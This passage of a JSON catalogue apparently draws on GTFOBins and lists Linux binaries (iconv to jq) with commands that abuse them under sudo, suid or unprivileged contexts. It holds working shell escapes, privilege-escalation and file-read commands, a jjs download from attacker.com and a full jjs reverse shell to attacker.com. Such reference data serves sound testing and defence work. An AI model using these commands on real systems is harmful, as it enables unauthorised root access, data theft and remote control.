installation","aliases":[]},{"id":"gtfo:iconv:file-read:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-read:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-read:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"iconv -f 8859_1 -t 8859_1 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-write:0:sudo","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-write:0:suid","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iconv:file-write:0:unprivileged","toolId":"gtfo:iconv","toolName":"iconv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | iconv -f 8859_1 -t 8859_1 -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iftop:shell:0:sudo","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iftop/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iftop:shell:0:suid","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/iftop/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iftop:shell:0:unprivileged","toolId":"gtfo:iftop","toolName":"iftop","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"iftop\n!/bin/sh","description":"This requires the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iftop/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:install:privilege-escalation:0:sudo","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:install:privilege-escalation:0:suid","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ionice:shell:0:sudo","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ionice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ionice:shell:0:suid","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ionice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ionice:shell:0:unprivileged","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ionice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:file-read:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:file-read:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:file-read:0:unprivileged","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:shell:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh\nip netns delete foo","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:shell:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh -p\nip netns delete foo","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ip:shell:1:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar\nip netns exec bar /bin/sh\nip netns delete foo\nip netns delete bar","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:iptables-save:file-write:0:sudo","toolId":"gtfo:iptables-save","toolName":"iptables-save","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"iptables -A INPUT -i lo -j ACCEPT -m comment --comment DATA\niptables -S\niptables-save -f /path/to/output-file","description":"The content is written along with a number of `iptables` rules.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iptables-save/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:irb:inherit:0:sudo","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/irb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:irb:inherit:0:unprivileged","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/irb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ispell:shell:0:sudo","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ispell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ispell:shell:0:suid","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ispell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ispell:shell:0:unprivileged","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ispell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:java:shell:0:sudo","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/java/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:java:shell:0:unprivileged","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/java/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:download:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:download:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-read:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-read:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-write:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:file-write:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:reverse-shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:reverse-shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jjs:shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:joe:shell:0:sudo","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/joe/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:joe:shell:0:suid","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/joe/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:joe:shell:0:unprivileged","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/joe/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:join:file-read:0:sudo","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/join/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:join:file-read:0:suid","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/join/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:join:file-read:0:unprivileged","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/join/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:journalctl:inherit:0:sudo","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/journalctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:journalctl:inherit:0:unprivileged","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/journalctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jq:file-read:0:sudo","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jq:file-read:0:suid","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jq:file-read:0:unprivileged","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jq/"],"compatibility":"Linux reference. 